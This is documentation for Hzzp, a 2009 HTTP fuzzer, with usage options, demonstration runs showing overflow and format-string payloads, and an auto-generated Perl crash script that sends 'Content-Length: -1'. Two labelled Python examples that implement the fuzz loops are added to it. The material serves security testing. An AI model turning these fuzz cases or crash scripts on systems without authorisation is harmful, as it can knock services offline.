hzzp_doc.txt
04.27.2009
Krakow Labs Development [www.krakowlabs.com]
Hzzp Documentation
rush@KL (Jeremy Brown) [rush@krakowlabs.com]

--------------------------------------------------------------------------------------------------------------------------------

WHAT IS IT?

Hzzp is an HTTP-compliant client and server fuzzer. Hzzp's main features include HTTP response and request fuzzing,
authentication fuzzing, query parameter fuzzing, and automatic or manual exploit generation.

Hzzp is pronounced "Huzzup".

--------------------------------------------------------------------------------------------------------------------------------

PURPOSE

Hzzp's purpose is to find vulnerabilities in HTTP-compliant clients and servers.

HTTP-compliant clients include:

Web Browsers
HTTP Mirroring Software
HTTP Proxy Clients
Download Managers

HTTP-compliant servers include:

HTTP Servers
HTTP Proxy Servers
HTTP User Interfaces
HTTP Administration Interfaces

Along with various other HTTP-speaking software.

--------------------------------------------------------------------------------------------------------------------------------

HOW DOES IT WORK?

Hzzp has enough of the HTTP protocol implemented to know how client and server exchanges work and where fuzzing data can be placed in them.

==============
Code Structure
==============

Client side fuzzing is largely automatic: every fuzzed response carries a meta refresh body, so the client reconnects on its own and receives the next case.

Server side fuzzing is achieved by connecting to the target, generating the fuzzing request, and sending it to the target. Options are available for logging and automatic exploit generation (or proof of concept in many cases) if Hzzp detects that the target has stopped accepting connections. Hzzp continues to fuzz until it has run out of target input to fuzz (how much there is depends on the fuzzing mode) and all fuzzing data has been exhausted.

Hzzp also includes a manual exploit generation mode and a banner retrieval function, along with many other options.
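The client side loop described above, as an added Python example that is not Hzzp's own code (Hzzp is C; the function names, the slot names and the doubling overflow schedule below are this example's assumptions): it builds each fuzzed response with the meta refresh body that makes the client come back, hands one case to each accepted connection, and includes a loopback self-test so it runs without a browser.

```python
import socket
import threading

# Added example. overflow_lengths / oracle / build_response / serve_cases are
# this example's names and approximations, not hzzp's fuzz.h oracle or API.

def overflow_lengths(start=550, steps=12):
    """Doubling overflow schedule: 550, 1100, 2200, ... (assumed; hzzp's own
    schedule in Demonstration #1 grows at about the same rate)."""
    return [start << i for i in range(steps)]

def oracle():
    """Yield (label, payload) cases: overflows, then format strings, then numbers."""
    for n in overflow_lengths():
        yield f"Overflow: A x {n}", "A" * n
    for spec in ("%n", "%p", "%s", "%d", "%x"):
        yield f"Format String: {spec} x 5", spec * 5
    yield "Format String: %s%p%x%d", "%s%p%x%d"
    yield "Format String: %.1024d", "%.1024d"
    for num in ("0", "-0", "1", "-1", "4294967295", "-2147483648"):
        yield f"Number: {num}", num

def build_response(slot, payload, refresh_url="http://10.10.10.1/", header="Server"):
    """One fuzzed response. slot mirrors the -C menu: protocol, version,
    status_code, status_phrase, header_name, header_value, basic, digest.
    The body is a meta refresh back to refresh_url (assumed fuzzing host)
    so a browser reconnects for the next case without operator help."""
    proto, ver, code, phrase = "HTTP", "1.1", "200", "OK"
    hdrs = [("Server", "Hzzp"), ("Connection", "close")]
    if slot == "protocol": proto = payload
    elif slot == "version": ver = payload
    elif slot == "status_code": code = payload
    elif slot == "status_phrase": phrase = payload
    elif slot == "header_name": hdrs.append((payload, "Hzzp"))
    elif slot == "header_value": hdrs = [h for h in hdrs if h[0] != header] + [(header, payload)]
    elif slot == "basic":
        code, phrase = "401", "Unauthorized"
        hdrs.append(("WWW-Authenticate", f'Basic realm="{payload}"'))
    elif slot == "digest":
        code, phrase = "401", "Unauthorized"
        hdrs.append(("WWW-Authenticate", f'Digest realm="{payload}", nonce="0123456789abcdef", qop="auth"'))
    else: raise ValueError(f"unknown slot {slot!r}")
    body = (f'<html><head><meta http-equiv="refresh" content="0;url={refresh_url}">'
            f"</head><body>next case</body></html>").encode("ascii")
    # Content-Length must be exact or the client waits for more body instead
    # of following the refresh; Connection: close ends the case cleanly.
    hdrs += [("Content-Type", "text/html"), ("Content-Length", str(len(body)))]
    head = "\r\n".join([f"{proto}/{ver} {code} {phrase}"] + [f"{k}: {v}" for k, v in hdrs])
    return head.encode("latin-1") + b"\r\n\r\n" + body

def serve_cases(srv, slot, cases, refresh_url="http://10.10.10.1/"):
    """Give each connection accepted on the already-bound listener srv the
    next case. Returns [(peer_ip, label), ...] in the order served."""
    served = []
    for label, payload in cases:
        conn, peer = srv.accept()
        with conn:
            conn.settimeout(3.0)
            try:
                conn.recv(65536)  # the client's request; its content is irrelevant
            except socket.timeout:
                pass
            conn.sendall(build_response(slot, payload, refresh_url))
        served.append((peer[0], label))
    return served

def demo_loopback(slot="status_code", count=3):
    """Constructed self-test: serve `count` cases on 127.0.0.1 and return the
    status line each client connection received."""
    cases = list(oracle())[:count]
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    t = threading.Thread(target=serve_cases, args=(srv, slot, cases), daemon=True)
    t.start()
    seen = []
    for _ in cases:
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(b"GET / HTTP/1.1\r\nHost: fuzz\r\n\r\n")
            data = b""
            while chunk := c.recv(65536):
                data += chunk
        seen.append(data.split(b"\r\n", 1)[0])
    t.join()
    srv.close()
    return seen

if __name__ == "__main__":
    # Real use: bind 0.0.0.0:80 as root, point the client at this host, then
    # serve_cases(srv, "status_code", oracle(), "http://<this host>/").
    for line in demo_loopback():
        print(line[:60])
```

In real use the signal is the client that stops coming back: nothing on the serving side can observe a client crash, so the case after which no new connection arrives is the one to reproduce by hand. The two 401 slots make a browser raise a credential prompt before it renders the body, so those cases only advance once the prompt is dismissed.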
==============
User Interface
==============

USAGE: ./hzzp <-C/-S/-E/-B> SELECTIONS
OPTIONAL: -T [Target] -P [Port] [-L Log.file] [-A exploit.pl] [-V] [-D]

-C Client Side Fuzzing
   1  (Protocol)
   2  (Protocol Version)
   3  (Status Code)
   4  (Status Phrase)
   5  (Response Headers)
   6  (Response Header Fields) [-s status code]
   7  (Basic Authentication)
   8  (Digest Authentication) [-p /path]

-S Server Side Fuzzing
   1  (Method)
   2  (Request)
   3  (Request Port)
   4  (Protocol)
   5  (Protocol Version)
   6  (Request Headers)
   7  (Request Header Fields) [-m method]
   8  (Basic Authentication)
   9  (Digest Authentication) [-p /path]
   10 (Query Parameters) -p [/path] -b [beginning query data] -x [parameter to fuzz] -e [ending query data]

-E Exploit Generation
-B (Fetch Banner) -T

PREFERENCES: -c [Custom Fuzzing Data] -h [Custom Header] -d [Digest #] -y [Oracle #] -z [Header #]
INFORMATION: [-F Fuzzing Oracle] [-H Headers] [-J Digest Directives] [-M Methods] [-O Status Codes]

===================
Programming Outline
===================

hzzp.c - Main UI
   hzzp_usage()         - Information Display
   hzzp_counter()       - Counter
   hzzp_fetch_banner()  - Fetch Banner

fuzz.c - Fuzzing Module
   hzzp_headline()      - Headline Generation
   hzzp_engine()        - Central Fuzzing Control
   hzzp_client()        - HTTP Client Fuzzing
   hzzp_server()        - HTTP Server Fuzzing
   hzzp_resp()          - HTTP Response Configuration
   hzzp_resp_fuzz()     - HTTP Response Control Data
   hzzp_resp_lines()    - HTTP Response Line Preparation and Delivery
   hzzp_resp_hdrs()     - HTTP Response Header Preparation and Delivery
   hzzp_resp_httpauth() - HTTP Response Authentication Preparation and Delivery
   hzzp_req()           - HTTP Request Configuration
   hzzp_req_fuzz()      - HTTP Request Control Data
   hzzp_req_lines()     - HTTP Request Line Preparation and Delivery
   hzzp_req_hdrs()      - HTTP Request Header Preparation and Delivery
   hzzp_req_httpauth()  - HTTP Request Authentication Preparation and Delivery
   hzzp_req_query()     - HTTP Request Query Preparation and Delivery
   hzzp_log()           - Logging
   hzzp_exgen()         - Exploit Generation
   hzzp_list_fzorc()    - List Fuzzing Oracle
   hzzp_list_hdrs()     - List HTTP Response and Request Headers
   hzzp_list_digdirs()  - List HTTP Digest Authentication Directives
   hzzp_list_methods()  - List HTTP Methods
   hzzp_list_scodes()   - List HTTP Status Codes
   hzzp_fzof_gen()      - Fuzzing Oracle's Overflow Data Generation

core.h - Core Header
fuzz.h - Fuzzing Oracle
http.h - HTTP Definitions

--------------------------------------------------------------------------------------------------------------------------------

HOW DO I USE IT?

1) Make Hzzp (or use the binary that comes with the package).

rush@linux:~/hzzp$ make
gcc hzzp.c fuzz.c -o hzzp
rush@linux:~/hzzp$

2) Define how you want to use Hzzp.

Note: FUZZ = Fuzzing Data

* Fuzz HTTP Clients (Protocol -> FUZZ/1.1 200 OK) -> ./hzzp -C 1 [-r xx]
* Fuzz HTTP Clients (Protocol Version -> HTTP/FUZZ 401 Unauthorized) -> ./hzzp -C 2 [-r 20]
* Fuzz HTTP Clients (Status Code -> HTTP/1.1 FUZZ OK) -> ./hzzp -C 3 [-r xx]
* Fuzz HTTP Clients (Status Phrase -> HTTP/1.1 200 FUZZ) -> ./hzzp -C 4 [-r xx]
* Fuzz HTTP Clients (Response Headers -> FUZZ: Hzzp) -> ./hzzp -C 5 [-r xx]
* Fuzz HTTP Clients (Response Header Fields -> Server: FUZZ) -> ./hzzp -C 6 [-r xx]
* Fuzz HTTP Clients (Basic Authentication -> WWW-Authenticate: Basic realm="FUZZ") -> ./hzzp -C 7 [-r xx] -p /admin
* Fuzz HTTP Clients (Digest Authentication -> WWW-Authenticate: Digest realm="FUZZ") -> ./hzzp -C 8 [-r xx] -p /admin
* Fuzz HTTP Servers (Method -> FUZZ / HTTP/1.1) -> ./hzzp -S 1 -T 1.2.3.4 [-m x]
* Fuzz HTTP Servers (Request -> GET /FUZZ HTTP/1.1) -> ./hzzp -S 2 -T 1.2.3.4 [-m x]
* Fuzz HTTP Servers (Request Port -> CONNECT 1.2.3.4:FUZZ HTTP/1.1) -> ./hzzp -S 3 -T 1.2.3.4 [-m 8]
* Fuzz HTTP Servers (Protocol -> GET / FUZZ/1.1) -> ./hzzp -S 4 -T 1.2.3.4 [-m x]
* Fuzz HTTP Servers (Protocol Version -> GET / HTTP/FUZZ) -> ./hzzp -S 5 -T 1.2.3.4 [-m x]
* Fuzz HTTP Servers (Request Headers -> FUZZ: Hzzp) -> ./hzzp -S 6 -T 1.2.3.4 [-m x]
* Fuzz HTTP Servers (Request Header Fields -> Referer: FUZZ) -> ./hzzp -S 7 -T 1.2.3.4 [-m x]
* Fuzz HTTP Servers (Basic Authentication -> Authorization: Basic FUZZ) -> ./hzzp -S 8 -T 1.2.3.4 [-m x] -p /admin
* Fuzz HTTP Servers (Digest Authentication -> Authorization: Digest username="FUZZ") -> ./hzzp -S 9 -T 1.2.3.4 [-m x] -p /admin
* Fuzz HTTP Servers (Query Parameters -> GET /x.cgi?id=123&user=FUZZ&pass=abcd) -> ./hzzp -S 10 -T 1.2.3.4 [-m x] -p /x.cgi -b "?id=123&" -x "user=" -e "&pass=abcd"
* Exploit Generation -> ./hzzp -E exploit.pl
* Fetch Banner -> ./hzzp -B -T 1.2.3.4
* Target -> ./hzzp -T 1.2.3.4
* Port (DEFAULT=80) -> ./hzzp -P 8080
* Logging -> ./hzzp -L hzzp.log
* Automatic Exploit Generation -> ./hzzp -A exploit.pl
* Verbose Output -> ./hzzp -V
* Debug Output -> ./hzzp -D
* Status Code (DEFAULT=3=200) -> ./hzzp -s 5
* Path (DEFAULT=/) -> ./hzzp -p /admin
* Beginning Query Data (DEFAULT=) -> ./hzzp -b "?id=123&"
* Parameter To Fuzz (DEFAULT="ptf=") -> ./hzzp -x "user="
* Ending Query Data (DEFAULT=) -> ./hzzp -e "&pass=abcd"
* Exploit Generation Output Filename -> ./hzzp -f exploit.pl
* Method (DEFAULT=2=GET) -> ./hzzp -m 8
* Custom Fuzzing Data -> ./hzzp -c `perl -e 'print "ABCD" x 260'`
* Custom Header Data -> ./hzzp -h `perl -e 'print "DBCA" x 260'`
* Starting Digest Directive # -> ./hzzp -d 2
* Starting Fuzzing Oracle # -> ./hzzp -y 5
* Starting Header # -> ./hzzp -z 5
* List Fuzzing Oracle -> ./hzzp -F
* List Headers -> ./hzzp -H
* List Digest Directives -> ./hzzp -J
* List Methods -> ./hzzp -M
* List Status Codes -> ./hzzp -O

3) Run Hzzp!

Demonstration #1 (Client Mode)

rush@linux:~/hzzp$ sudo ./hzzp -V -C 3

********** [Fuzzing Status Code] **********
Krakow Labs Development -> Hzzp
********** [Fuzzing Status Code] **********

INFO: Hzzp -> CLIENT MODE INITALIZING...
VERBOSE: Creating Socket... SUCCESS
VERBOSE: Binding to PORT 80... SUCCESS
VERBOSE: Listening on Socket... SUCCESS
INFO: Hzzp -> Waiting for Connections...
VERBOSE: [1] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 550)
VERBOSE: [2] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 1100)
VERBOSE: [3] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 2100)
VERBOSE: [4] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 4200)
VERBOSE: [5] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 8400)
VERBOSE: [6] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 16500)
VERBOSE: [7] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 33000)
VERBOSE: [8] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 65800)
VERBOSE: [9] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 131200)
VERBOSE: [10] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 262400)
VERBOSE: [11] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 525000)
VERBOSE: [12] Client 10.10.10.101 connected --> Fuzzing Status Code: (Overflow: A x 1050000)
VERBOSE: [13] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %n x 5)
VERBOSE: [14] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %p x 5)
VERBOSE: [15] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %s x 5)
VERBOSE: [16] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %d x 5)
VERBOSE: [17] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %x x 5)
VERBOSE: [18] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %s%p%x%d)
VERBOSE: [19] Client 10.10.10.101 connected --> Fuzzing Status Code: (Format String: %.1024d)
.....
rush@linux:~/hzzp$

Demonstration #2 (Server Mode w/ automatic exploit generation)

rush@linux:~/hzzp$ ./hzzp -V -T 10.10.10.101 -S 7 -L httpserv.log -A httpserv.pl -y 25 -z 12

********** [Fuzzing Request Header Fields] **********
Krakow Labs Development -> Hzzp
********** [Fuzzing Request Header Fields] **********

INFO: Hzzp -> SERVER MODE INITALIZING...
VERBOSE: Creating Socket... SUCCESS
VERBOSE: Connecting to 10.10.10.101:80... SUCCESS
INFO: Hzzp -> Fuzzing Target...
VERBOSE: [1] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %99999999999s)
VERBOSE: [2] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %08x)
VERBOSE: [3] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20n)
VERBOSE: [4] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20p)
VERBOSE: [5] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20s)
VERBOSE: [6] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20d)
VERBOSE: [7] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %%20x)
VERBOSE: [8] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Format String: %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%)
VERBOSE: [9] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: 0)
VERBOSE: [10] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: -0)
VERBOSE: [11] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: 1)
VERBOSE: [12] Target @ [10.10.10.101]:80 --> Request Header Fields: (Content-Length + Number: -1)
hzzp_error: connect(10.10.10.101:80)
ALERT: ***** Hzzp might have found a bug! *****
INFO: Hzzp -> Details logged in httpserv.log
INFO: Generating Exploit...
INFO: Generation Successful! --> httpserv.pl
rush@linux:~/hzzp$

rush@linux:~/hzzp$ cat httpserv.log
Hzzp might have found a bug!
Host: 10.10.10.101 [10.10.10.101] -> Port 80
Mode: Fuzzing Request Header Fields
Method: GET
Header: "Content-Length"
Fuzzing Data: "Number: -1"
rush@linux:~/hzzp$

rush@linux:~/hzzp$ cat httpserv.pl
#!/usr/bin/perl
# Krakow Labs Development [www.krakowlabs.com]
# Exploit Generated by Hzzp
# httpserv.pl

use IO::Socket;

$target = "10.10.10.101";
$port = 80;
$payload = "GET / HTTP/1.1\r\nContent-Length: -1\r\n\r\n";

$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
$sock->send($payload);
close($sock);
rush@linux:~/hzzp$

--------------------------------------------------------------------------------------------------------------------------------

Associated Files & Information:

http://www.krakowlabs.com/dev/fuz/hzzp/hzzp
http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.c.txt
http://www.krakowlabs.com/dev/fuz/hzzp/fuzz.c.txt
http://www.krakowlabs.com/dev/fuz/hzzp/core.h.txt
http://www.krakowlabs.com/dev/fuz/hzzp/fuzz.h.txt
http://www.krakowlabs.com/dev/fuz/hzzp/http.h.txt
http://www.krakowlabs.com/dev/fuz/hzzp/Makefile.txt
http://www.krakowlabs.com/dev/fuz/hzzp/hzzp_doc.txt
http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.tar.gz
http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.jpeg
http://www.krakowlabs.com/dev/fuz/hzzp/hzzp.avi
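The server side loop from Demonstration #2, as an added Python example that is not Hzzp's own code (the function and slot names are this example's assumptions, and the replay script it writes only mirrors the shape of the httpserv.pl shown above): it builds the request for each -S slot, delivers cases until a connect is refused, and writes a replay script for the last case that actually reached the target. It runs here against a constructed local stand-in that stops listening after a set number of requests.

```python
import socket
import threading

# Added example. build_request / send_case / fuzz / generate_poc are this
# example's names, not hzzp's hzzp_req_* / hzzp_exgen (which are C).

def build_request(slot, payload, method="GET", path="/", host="10.10.10.101",
                  header="Referer", begin="", param="ptf=", end=""):
    """One request with the payload in the chosen slot. Slots follow the -S
    menu: method, request, port, protocol, version, header_name,
    header_value, basic, digest, query (begin/param/end are -b/-x/-e)."""
    m, target, proto, ver = method, path, "HTTP", "1.1"
    hdrs = [("Host", host), ("User-Agent", "Hzzp-example"), ("Connection", "close")]
    if slot == "method": m = payload
    elif slot == "request": target = "/" + payload
    elif slot == "port": m, target = "CONNECT", f"{host}:{payload}"
    elif slot == "protocol": proto = payload
    elif slot == "version": ver = payload
    elif slot == "header_name": hdrs.append((payload, "Hzzp"))
    elif slot == "header_value": hdrs.append((header, payload))
    elif slot == "basic": hdrs.append(("Authorization", "Basic " + payload))
    elif slot == "digest":
        hdrs.append(("Authorization", f'Digest username="{payload}", realm="x", '
                                      f'nonce="x", uri="{path}", response="x"'))
    elif slot == "query": target = path + begin + param + payload + end
    else: raise ValueError(f"unknown slot {slot!r}")
    head = "\r\n".join([f"{m} {target} {proto}/{ver}"] + [f"{k}: {v}" for k, v in hdrs])
    return (head + "\r\n\r\n").encode("latin-1")

def send_case(host, port, request, timeout=3.0):
    """Deliver one case. 'refused' = the TCP connect failed (the signal hzzp
    acts on); 'reset' = the peer dropped us mid-case; 'sent' otherwise."""
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "refused"
    with s:
        try:
            s.sendall(request)
            s.recv(4096)  # drain a reply if one comes; its content is irrelevant
        except socket.timeout:
            pass
        except OSError:
            return "reset"
    return "sent"

def fuzz(host, port, slot, cases, log, **kw):
    """Play cases in order and stop at the first refused connect. Returns the
    (label, request) delivered just before the target went away: that is the
    case to replay, since the one whose connect failed never reached it."""
    last_sent = None
    for label, payload in cases:
        req = build_request(slot, payload, host=host, **kw)
        result = send_case(host, port, req)
        log.append(f"{label}: {result}")
        if result == "refused":
            return last_sent
        last_sent = (label, req)
    return None

def perl_quote(raw):
    """Escape bytes for a Perl double-quoted string."""
    s = raw.decode("latin-1")
    for ch, rep in (("\\", "\\\\"), ('"', '\\"'), ("$", "\\$"), ("@", "\\@"),
                    ("\r", "\\r"), ("\n", "\\n")):
        s = s.replace(ch, rep)
    return s

def generate_poc(host, port, request):
    """Replay script in the same shape as the httpserv.pl hzzp wrote above."""
    return "\n".join([
        "#!/usr/bin/perl",
        "# replay script written by the example fuzz loop",
        "use IO::Socket;",
        f'$target = "{host}";',
        f"$port = {port};",
        f'$payload = "{perl_quote(request)}";',
        "$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port)"
        ' or die "Error: $target:$port\\n";',
        "$sock->send($payload);",
        "close($sock);",
        "",
    ])

def simulate_target(die_after):
    """Constructed stand-in for a target that answers `die_after` requests and
    then stops listening. The listener is closed before the last answer goes
    out, so the caller's next connect is refused. Returns (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    port = srv.getsockname()[1]
    def run():
        for i in range(die_after):
            conn, _ = srv.accept()
            conn.recv(65536)
            if i == die_after - 1:
                srv.close()
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
            conn.close()
    threading.Thread(target=run, daemon=True).start()
    return "127.0.0.1", port

def demo():
    """Constructed run of Demonstration #2's Content-Length number cases
    against a target that dies on its fourth request. Returns (suspect, poc, log)."""
    cases = [(f"Number: {n}", n) for n in ("0", "-0", "1", "-1", "4294967295")]
    host, port = simulate_target(die_after=4)
    log = []
    label, req = fuzz(host, port, "header_value", cases, log, header="Content-Length")
    return label, generate_poc(host, port, req), log

if __name__ == "__main__":
    label, poc, log = demo()
    print("\n".join(log), "\nsuspect:", label, "\n", poc)
```

Attribution around a connect failure is the point to be careful with: the case whose connect fails never reached the target, so the case to replay is the last one delivered, and a stand-alone replay against a restarted target is what turns "might have found a bug" into a confirmed crash. A refused connect can also mean the target was restarted, rate-limited you, or hit a connection cap, so check the target's own logs or attach a debugger before calling it a finding.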